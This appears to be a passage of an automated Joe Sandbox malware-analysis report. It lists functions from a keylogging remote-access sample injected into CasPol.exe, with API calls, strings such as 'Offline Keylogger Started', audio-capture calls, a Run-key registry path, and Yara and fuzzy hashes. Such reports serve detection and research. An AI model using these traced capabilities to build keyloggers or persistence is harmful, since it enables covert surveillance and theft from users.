                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                                                  • String ID: alarm.wav$xIG
                                                                                                                                                                                                                                  • API String ID: 1174141254-4080756945
                                                                                                                                                                                                                                  • Opcode ID: b5ca722cdde6f6b3a06bca646ac48d5ba066ff8e75ffb3c1fa2bfcd6fa3ac476
                                                                                                                                                                                                                                  • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5ca722cdde6f6b3a06bca646ac48d5ba066ff8e75ffb3c1fa2bfcd6fa3ac476
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                                                                                                                                                                  Function 04571EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04572903
                                                                                                                                                                                                                                    • Part of subcall function 045735D2: RaiseException.KERNEL32(?,?,?,04572925,00000000,00000000,00000000,?,?,?,?,?,04572925,?,045821B8), ref: 04573632
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04572920
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                                                                                  • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                  • Opcode ID: b89f387040604b215d55f14119055f9825f5afd00db0cffc5a23f90edb210005
                                                                                                                                                                                                                                  • Instruction ID: 2399ea823d25c38313dcf1693b2c4f7ba388ab2dd865c6b6a619553155c6aa1f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b89f387040604b215d55f14119055f9825f5afd00db0cffc5a23f90edb210005
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AF0F434A0030E739B04BAA5FC449AD37ACBF41654F5085F4FA14A2091FF31FA16F580
                                                                                                                                                                                                                                  Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                                                                                                                                    • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                                                                                                                                                  • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                                                                                  • String ID: Online Keylogger Stopped
                                                                                                                                                                                                                                  • API String ID: 1623830855-1496645233
                                                                                                                                                                                                                                  • Opcode ID: 66579ce885549906bf361f976415d7046a76c4188ad73fea538d879202c14992
                                                                                                                                                                                                                                  • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66579ce885549906bf361f976415d7046a76c4188ad73fea538d879202c14992
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                                                                                                                                                                  Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • waveInPrepareHeader.WINMM(00F553D8,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                                                                                                                                                  • waveInAddBuffer.WINMM(00F553D8,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                                                                                  • String ID: T=G
                                                                                                                                                                                                                                  • API String ID: 2315374483-379896819
                                                                                                                                                                                                                                  • Opcode ID: 681d1aa608717ae782e0e359d0672b86d60b3e506acf780633a0be7ede32c365
                                                                                                                                                                                                                                  • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 681d1aa608717ae782e0e359d0672b86d60b3e506acf780633a0be7ede32c365
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                                                                                                                                                  Function 00447790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LocaleValid
                                                                                                                                                                                                                                  • String ID: IsValidLocaleName$j=D
                                                                                                                                                                                                                                  • API String ID: 1901932003-3128777819
                                                                                                                                                                                                                                  • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                                                                  • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                                                                                                                                                  Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: T=G$T=G
                                                                                                                                                                                                                                  • API String ID: 3519838083-3732185208
                                                                                                                                                                                                                                  • Opcode ID: d35d56db29c3f898e339c7594dbfd576fe9197a4ca502cfea50645c21fb802bf
                                                                                                                                                                                                                                  • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d35d56db29c3f898e339c7594dbfd576fe9197a4ca502cfea50645c21fb802bf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                                                                                                                                                                  Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                                                                                                                                                    • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                                                                                                                                    • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                                                                                                    • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                                                                                                    • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                                                                                                    • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                                                                                                                                    • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                                                                                                                    • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                                                                                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                                                                                  • String ID: [AltL]$[AltR]
                                                                                                                                                                                                                                  • API String ID: 2738857842-2658077756
                                                                                                                                                                                                                                  • Opcode ID: e4783406b8090f957eb699ebcca1d9f5d1236a3a3c59c967461c79b8c7bb50b0
                                                                                                                                                                                                                                  • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4783406b8090f957eb699ebcca1d9f5d1236a3a3c59c967461c79b8c7bb50b0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                                                                                                                                                  Function 00448803 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00448825
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast_free
                                                                                                                                                                                                                                  • String ID: `@$`@
                                                                                                                                                                                                                                  • API String ID: 1353095263-20545824
                                                                                                                                                                                                                                  • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                                                                                                  • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                                                                                                                                                                  Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: State
                                                                                                                                                                                                                                  • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                                                                                  • API String ID: 1649606143-2446555240
                                                                                                                                                                                                                                  • Opcode ID: 1a2acc7ae96ea6d3970b85c1ad092b7db079889dc64632d6b42e586a77c2ffe8
                                                                                                                                                                                                                                  • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a2acc7ae96ea6d3970b85c1ad092b7db079889dc64632d6b42e586a77c2ffe8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                                                                                                                                  Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DeleteOpenValue
                                                                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                                                                                  • API String ID: 2654517830-1051519024
                                                                                                                                                                                                                                  • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                                                                  • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                                                                                                                                  Function 0040AF77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DeleteDirectoryFileRemove
                                                                                                                                                                                                                                  • String ID: pth_unenc
                                                                                                                                                                                                                                  • API String ID: 3325800564-4028850238
                                                                                                                                                                                                                                  • Opcode ID: 058bd8072921940ac6c17e91e9c154a8c4f0c918009ed77795babcdc161dd952
                                                                                                                                                                                                                                  • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 058bd8072921940ac6c17e91e9c154a8c4f0c918009ed77795babcdc161dd952
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                                                                                                                                                  Function 1000A5C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 1000A5D2
                                                                                                                                                                                                                                    • Part of subcall function 1000A547: std::exception::exception.LIBCONCRT ref: 1000A554
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 1000A5E0
                                                                                                                                                                                                                                    • Part of subcall function 1000C804: RaiseException.KERNEL32(?,?,1000A5C5,?,?,?,?,?,?,?,?,1000A5C5,?,10029888,?), ref: 1000C863
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                                                                                  • API String ID: 1586462112-410509341
                                                                                                                                                                                                                                  • Opcode ID: 8dd5df01de20f634a69ec2260896378e75b1805372777f46904e0a70281a341b
                                                                                                                                                                                                                                  • Instruction ID: 0adb93ce51021025e8d7fce423e68b35576232a694bedcd472ba45c4d6c42089
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dd5df01de20f634a69ec2260896378e75b1805372777f46904e0a70281a341b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0D0A73C90010C77DB04DAA4DC41D9C776CFF05184FD08060B654C2145EB31EA998781
                                                                                                                                                                                                                                  Function 00411699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                                                                                                                  • String ID: pth_unenc
                                                                                                                                                                                                                                  • API String ID: 1872346434-4028850238
                                                                                                                                                                                                                                  • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                                                                                                                                  • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                                                                                                                                                  Function 0041ACA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CountInfoInputLastTick
                                                                                                                                                                                                                                  • String ID: >G
                                                                                                                                                                                                                                  • API String ID: 3478931382-1296849874
                                                                                                                                                                                                                                  • Opcode ID: 1111c95a6731b81c7f960cf0461dbe35cffbdc62c157a0c369b4dce9d438a623
                                                                                                                                                                                                                                  • Instruction ID: 0f25e8e52f9a29d92835049ed671f456ff59a02a7b46a548dc943f175ac88346
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1111c95a6731b81c7f960cf0461dbe35cffbdc62c157a0c369b4dce9d438a623
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FCD0127040020DBFCB00DFE4EC4D98DBFFCEB00349F104168A005A2111DB70E6448B24
                                                                                                                                                                                                                                  Function 0043FA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                  • String ID:
